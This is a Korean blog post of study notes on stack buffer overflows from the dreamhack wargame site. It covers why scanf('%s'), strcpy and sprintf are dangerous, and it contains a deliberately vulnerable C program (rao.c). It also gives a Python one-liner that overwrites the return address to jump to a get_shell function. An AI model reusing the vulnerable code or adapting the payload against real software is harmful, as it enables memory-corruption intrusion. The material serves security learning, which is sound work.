스택 버퍼 오버플로우 ( Stack buffer Overflow )

스택 오버플로우 VS 스택 버퍼 오버플로우

스택 오버플로우 : 스택영역이 너무 많이 확장돼서 발생하는 버그

스택 버퍼 오버플로우 : 스택에 위치한 버퍼에 버퍼의 크기보다 많은 데이터가 입력되어 발생하는 버그 (스택의 버퍼에서 발생하는 오버플로우)

버퍼(buffer)란? 데이터가 목적지로 이동되기 전에 보관되는 임시 저장소

스택 버퍼 : 스택에 있는 지역변수

힙 버퍼 : 힙에 할당된 메모리 영역

Ex1) 데이터 변조

- 버퍼 오버플로우로 인해 뒤의 데이터 값을 변조시킬 수 있다.

Ex2) 데이터 유출

c언어에서 문자열의 끝을 null로 인식하는데 버퍼 오버플로우를 통해 null을 없애주면 뒤의 데이터까지 함께 읽는 것이 가능해진다.

Ex3) 실행흐름조작

예를 들면 함수의 ret에 자신이 실행하고 싶은 명령어가 존재하는 메모리 주소로 덮어씌우면 실행흐름조작이 가능하다.

취약점 분석!!!

-scanf("%s",buf) 함수의 포맷 스트림중 하나인 %s는 문자열 입력에 사용하며, 입력의 길이를 제한하지 않는다.

공백문자인 띄어쓰기, 탭, 개행문자가 들어올때까지 계속 입력을 받는다.

---> 악의적으로 버퍼의 크기보다 큰 데이터를 입력하면 오버플로우가 발생할 수 있다.

따라서 scanf에 %s 포맷은 사용하지 말아야 하며 정확히 n개의 문자만 입력을 받는 "%[n]s"의 형태로 사용해야한다.

문자열을 사용할 때는 반드시 해당 문자열이 널바이트로 종결되는지 확인해야 한다. (index out of bound를 막기 위해)

이뿐만 아니라, 버퍼를 사용하면서 길이를 입력하지 않는 함수들은 대부분 위험하다.

(strcpy, strcat, sprintf)

비정상적으로 긴 입력을 준 경우 segmentation fault 에러가 출력된다. (잘못된 메모리 주소에 접근했다는 의미)

Segmentation fault (core dumped) // core dumped 는 디버깅을 돕기 위해 리눅스가 생성해주는 코어 파일

gdb -c core //  gdb에서 코어파일 디버깅 가능

스택버퍼에 오버플로우를 발생시켜서 반환주소를 덮으려면, 해당 버퍼가 스택프레임의 어디에 위치하는지 조사해야한다.

[공격할 c 파일]

// Name: rao.c
// Compile: gcc -o rao rao.c -fno-stack-protector -no-pie
#include <stdio.h>
#include <unistd.h>
void init() {
  setvbuf(stdin, 0, 2, 0);
  setvbuf(stdout, 0, 2, 0);
}
void get_shell() {
  char *cmd = "/bin/sh";
  char *args[] = {cmd, NULL};
  execve(cmd, args, NULL);
}
int main() {
  char buf[0x28];
  init();
  printf("Input: ");
  scanf("%s", buf);
  return 0;
}

[scanf의 어셈블리 코드]

   0x4005fe <main+25>            lea    rax, [rbp - 0x30]
   0x400602 <main+29>            mov    rsi, rax
   0x400605 <main+32>            lea    rdi, [rip + 0xa8] #0x4006b4
   0x40060c <main+39>            mov    eax, 0
 ► 0x400611 <main+44>            call   __isoc99_scanf@plt <__isoc99_scanf@plt>

--> scaf("%s",rbp-0x30)

입력할 버퍼와 반환 주소 사이의 거리만큼을 쓰레기 값으로 채우고 그 이후에 조작할 명령어 주소로 ret를 덮어씌우면 된다!!

+) 파이썬 공격 코드 작성법

python -c 'print("......................")'; cat) | ./"실행파일명"

(문제 풀이)

1. rbp-0x30 에 scanf로 문자열을 받는다는 것을 확인

2. rbp+0x8 (rip) 에 return address 저장되어있음

3. get_shell의 주소 알아내서 리틀엔디안 방식으로 고친다.

(python -c "print('A'*0x30 + 'B'*0x8 + '\xdd\x11\x40\x00\x00\x00\x00\x00')";cat)| ./"rao"

+) 주의해야할 것

- null byte overflow를 막기 위해서는 버퍼의 크기보다 최소 1byte 작게 입력을 받아야 한다.!!!

[출처]

dreamhack 사이트

https://ccurity.tistory.com/229 [열공하는베짱이]

'Hacking > System Hacking' 카테고리의 다른 글

[dreamhack] basic_exploitation_000 문제풀이 (0)	2022.04.01
[dreamhack] Return Address Overwrite 풀이 (0)	2022.03.31
Shellcode 란? (0)	2022.03.30
pwntools 사용법 (0)	2022.03.28
gdb 사용법 익히기 (0)	2022.03.28

'Hacking > System Hacking' 카테고리의 다른 글

검색 태그

티스토리툴바